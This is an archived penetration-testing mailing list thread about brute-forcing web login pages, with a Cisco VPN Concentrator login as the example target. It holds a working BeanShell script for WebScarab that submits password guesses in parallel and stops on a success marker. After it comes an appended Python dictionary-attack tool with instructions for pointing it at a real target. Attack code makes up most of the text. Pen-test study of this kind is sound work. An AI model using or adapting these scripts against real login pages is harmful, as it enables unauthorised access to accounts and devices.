Penetration Testing mailing list archives
Re: BruteForcing?
From: Rogan Dawes <discard () dawes za net>
Date: Wed, 18 Oct 2006 10:28:35 +0200
Troy Fletcher wrote:
Sparky, for brute forcing web pages, I use Perl scripts combined with Linux tools like cURL and Wget. If you know any programming/scripting languages, I can point you in the right direction. To help see the traffic exchange for web page login attempts I recommend using a proxy like WebScarab; once you see the POSTs or GETs, automating attacks with cURL is easy. I don't know any _good_ pre-made web page brute force tools, but I'm sure that if someone else does, they'll share.
WebScarab can also be used to brute force web pages, using the Scripted plugin. One major advantage to using WebScarab is that your attack is/can be multi-threaded automatically: WebScarab will attempt up to 4 simultaneous requests.
Here is a simple script that uses an existing request as a template (for URLs, methods, headers, etc.) and just replaces the request body. In my example, I'll take words from a predefined array, but the technique can very easily be extended to reading lines from a file.
The script language is BeanShell, which is very similar to Java (BeanShell can evaluate actual Java classes in "strict" mode).
```java
// check the source (or the appendix in the online help) for the
// methods you can use on Request and Response
import org.owasp.webscarab.model.Request;
import org.owasp.webscarab.model.Response;

// This function/method is the main loop.
// You need to provide three methods that this function will invoke
//
// boolean hasMoreRequests()             - if there are more requests to issue
// Request getNextRequest()              - the next request to submit
// void handleResponse(Response response) - allows you to do something
//                                          with the responses obtained
//
void fetchParallel() {
    // while we have more requests to submit, or we are busy processing
    // the last requests sent off/waiting for a response
    while (hasMoreRequests() || scripted.isAsyncBusy()) {
        // while there are fewer than 4 outstanding requests
        // and we have more to try
        while (scripted.hasAsyncCapacity() && hasMoreRequests()) {
            scripted.submitAsyncRequest(getNextRequest());
        }
        // if there is a response waiting to be processed
        if (scripted.hasAsyncResponse()) {
            while (scripted.hasAsyncResponse()) {
                handleResponse(scripted.getAsyncResponse());
            }
        } else Thread.sleep(100);
    }
}

String[] words = new String[] {"word1", "word2", "word3", "word4"};
int nextWord = 0;
boolean stop = false;

// This gets a copy of the request with ID 53, from the past
// conversations. Adjust to suit your particular situation.
Request template = scripted.getRequest(53);

boolean hasMoreRequests() {
    // keep going while words remain AND no hit has been found yet
    // (with "|| stop" this would keep returning true after a hit and
    // getNextRequest() would then index past the end of the array)
    return nextWord < words.length && !stop;
}

Request getNextRequest() {
    Request req = new Request(template); // make a copy
    String word = words[nextWord++];     // increment the counter
    out.println("Trying " + word);
    // Note that the content is always a byte array
    // you might also want to consider URLEncoding your words?
    // Also note that IF there is an existing Content-Length header
    // it will automatically be updated to match the length of the
    // content
    req.setContent(("username=joe&password=" + word).getBytes());
    return req;
}

void handleResponse(Response response) {
    byte[] content = response.getContent();
    if (response.getStatus().equals("200") && content != null) {
        String html = new String(content); // consider encoding?
        if (html.indexOf("successful") > -1) {
            // we're in! Save it for review
            scripted.addConversation(response);
            stop = true;
        }
    }
}

// start the main loop
fetchParallel();
```
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of 09sparky () gmail com
Sent: Sunday, October 15, 2006 12:03 PM
To: pen-test () securityfocus com
Subject: BruteForcing?

This is more of a general brute forcing question, but one with which I could use some assistance.
[snip]
Second question: Brute forcing also, but against web pages. For example, on a Cisco 3000 VPN Concentrator, I have the web page asking for username/password. How would I attempt to dictionary attack this?

Thanks,
Sparky
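The same idea as the WebScarab script above (a template request, one candidate word per request, at most four requests in flight, stop issuing new ones once the success marker is seen), written as an added, stand-alone Python example rather than code from the list post. It also does the URL-encoding the script's comment only hints at. The target is a constructed in-process stand-in (fake_login) that mimics a form-login endpoint answering 200 either way; the username "joe", the password list and the "successful" marker are assumptions for the demo, not anything observed on a real device.

```python
"""Bounded-concurrency dictionary attack against a web login form.

Added example modelled on the WebScarab fetchParallel() loop; the target
here is an in-process stand-in, so it runs offline.
"""
import queue
import threading
from urllib.parse import parse_qs, urlencode

# Constructed stand-in for the target's login handler (assumption: a
# form POST of username/password that answers 200 either way and puts
# the word "successful" in the body on a good login).
VALID_USER = "joe"
VALID_PASS = "s3cret&more"  # contains '&' on purpose: unencoded it would be cut at the '&'


def fake_login(body: str):
    """Simulated server side: parse the urlencoded body, return (status, html)."""
    params = parse_qs(body, keep_blank_values=True)
    user = params.get("username", [""])[0]
    password = params.get("password", [""])[0]
    if user == VALID_USER and password == VALID_PASS:
        return 200, "<html>Login successful</html>"
    return 200, "<html>Invalid username or password</html>"


def build_body(username: str, word: str) -> str:
    """URL-encode the form fields so '&', '=' or '%' inside a candidate
    cannot be misparsed as a field separator by the target."""
    return urlencode({"username": username, "password": word})


def looks_successful(status: int, html) -> bool:
    """Same success oracle as handleResponse(): HTTP 200 plus a marker string."""
    return status == 200 and html is not None and "successful" in html


def dictionary_attack(words, username, send, max_outstanding=4):
    """Keep up to max_outstanding requests in flight and stop handing out
    new candidates once a hit is seen. Returns (winning word or None, attempts)."""
    pending = queue.Queue()
    for w in words:
        pending.put(w)
    stop = threading.Event()
    lock = threading.Lock()
    state = {"hit": None, "attempts": 0}

    def worker():
        # Equivalent of "nextWord < words.length && !stop": no new request
        # is issued after a hit, but requests already in flight still finish.
        while not stop.is_set():
            try:
                word = pending.get_nowait()
            except queue.Empty:
                return
            status, html = send(build_body(username, word))
            with lock:
                state["attempts"] += 1
                if looks_successful(status, html) and state["hit"] is None:
                    state["hit"] = word
                    stop.set()

    threads = [threading.Thread(target=worker) for _ in range(max_outstanding)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return state["hit"], state["attempts"]


if __name__ == "__main__":
    # Constructed word list; the real thing reads lines from a file.
    wordlist = ["password", "letmein", "joe123", "s3cret&more", "qwerty", "admin"]
    hit, tried = dictionary_attack(wordlist, "joe", fake_login)
    print(f"hit={hit!r} after {tried} attempts")
```

To point this at a real target, replace `fake_login` with a function that sends the body over HTTP (with the same headers as the captured template request) and returns the status and body; everything else stays the same. Before trusting the "successful" oracle, send one known-bad login by hand and confirm the failure page does not also contain the marker.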